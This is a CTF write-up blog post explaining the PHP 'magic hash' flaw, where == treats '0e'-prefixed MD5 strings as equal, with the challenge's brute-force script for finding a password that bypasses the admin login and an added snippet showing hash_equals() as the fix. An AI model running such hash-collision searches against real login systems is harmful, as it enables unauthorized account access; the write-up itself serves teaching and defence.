PHP md5 function vulnerability

CTF writeup, Internetwache CTF

Posted by Heeraj on February 25, 2016

If you would like to read our older blog posts, you are welcome: I4INFO

Well, I thought I would discuss an interesting 50-point web challenge. There is no admin.php on the server, but there is a flag.php. We have a login option for which the username is given and the password hash is given, but there is a salt involved.

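So what is so interesting? It is interesting because of how PHP compares hashes; see this article: https://news.ycombinator.com/item?id=9484757. All MD5 values that start with 0e and have only digits after it are treated as equal by PHP's == operator, because they are parsed as floats in exponent notation and converted to 0.0. So we can say md5('240610708') == md5('QNKCDZO'). The admin hash in the source below has exactly this form, so any password whose salted hash also has this form passes the == check.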

<?php
// Values taken from the challenge source.
$admin_user = "pr0_adm1n";
$admin_pw = clean_hash("0e408306536730731920197920342119");

// Strip everything that is not a lowercase hex character.
function clean_hash($hash) {
    return preg_replace("/[^0-9a-f]/", "", $hash);
}

// Double MD5 with the salt appended to the inner hex digest.
function myhash($str) {
    return clean_hash(md5(md5($str) . "SALT"));
}

// Build a random alphanumeric string of the given length.
function generateRandomString($length = 10) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomString .= $characters[rand(0, $charactersLength - 1)];
    }
    return $randomString;
}

// Try random 8-character strings and report any whose salted hash
// loosely equals (==) the stored admin hash.
for ($i = 0; $i < 100000000; $i++) {
    $result = generateRandomString(8);
    if (myhash($result) == $admin_pw) {
        print("woo!");
        print($result . " " . myhash($result) . "\n");
    }
}
?>
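The root cause is the `==` between two hash strings. The following is an added example, not code from the original writeup or the challenge: it puts the loose comparison beside a strict one using `hash_equals()`. The helper names `is_magic_hash`, `check_loose` and `check_strict` are hypothetical, and plain `md5()` stands in for the challenge's salted `myhash()` so the two inputs quoted above can be used directly.

```php
<?php
// Added example: loose vs. strict comparison of hash strings.
// Helper names are hypothetical; plain md5() replaces the salted myhash().

// True when a digest has the shape that == treats as a number:
// zeros, then "e", then only decimal digits, i.e. 0 * 10^N = 0.
function is_magic_hash(string $digest): bool
{
    return preg_match('/^0+e[0-9]+\z/', $digest) === 1;
}

// Vulnerable pattern from the challenge: both operands are numeric
// strings, so PHP compares them as floats (0.0 == 0.0).
function check_loose(string $candidate, string $stored): bool
{
    return $candidate == $stored;
}

// Hardened pattern: byte-for-byte, timing-safe string comparison.
function check_strict(string $candidate, string $stored): bool
{
    return hash_equals($stored, $candidate);
}

// Stored admin hash as shown in the challenge source.
$stored = '0e408306536730731920197920342119';

// The two inputs quoted in the post, plus one constructed control value.
$inputs = ['240610708', 'QNKCDZO', 'hunter2'];

foreach ($inputs as $input) {
    $digest = md5($input);
    printf(
        "%-10s %s magic=%-5s loose=%-5s strict=%s\n",
        $input,
        $digest,
        var_export(is_magic_hash($digest), true),
        var_export(check_loose($digest, $stored), true),
        var_export(check_strict($digest, $stored), true)
    );
}
```

For real password storage, `password_hash()` and `password_verify()` replace both the salted MD5 and the comparison.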

Referred from https://eugenekolo.com

This was one of the web problems in Internetwache CTF.

Thank you for reading the blog!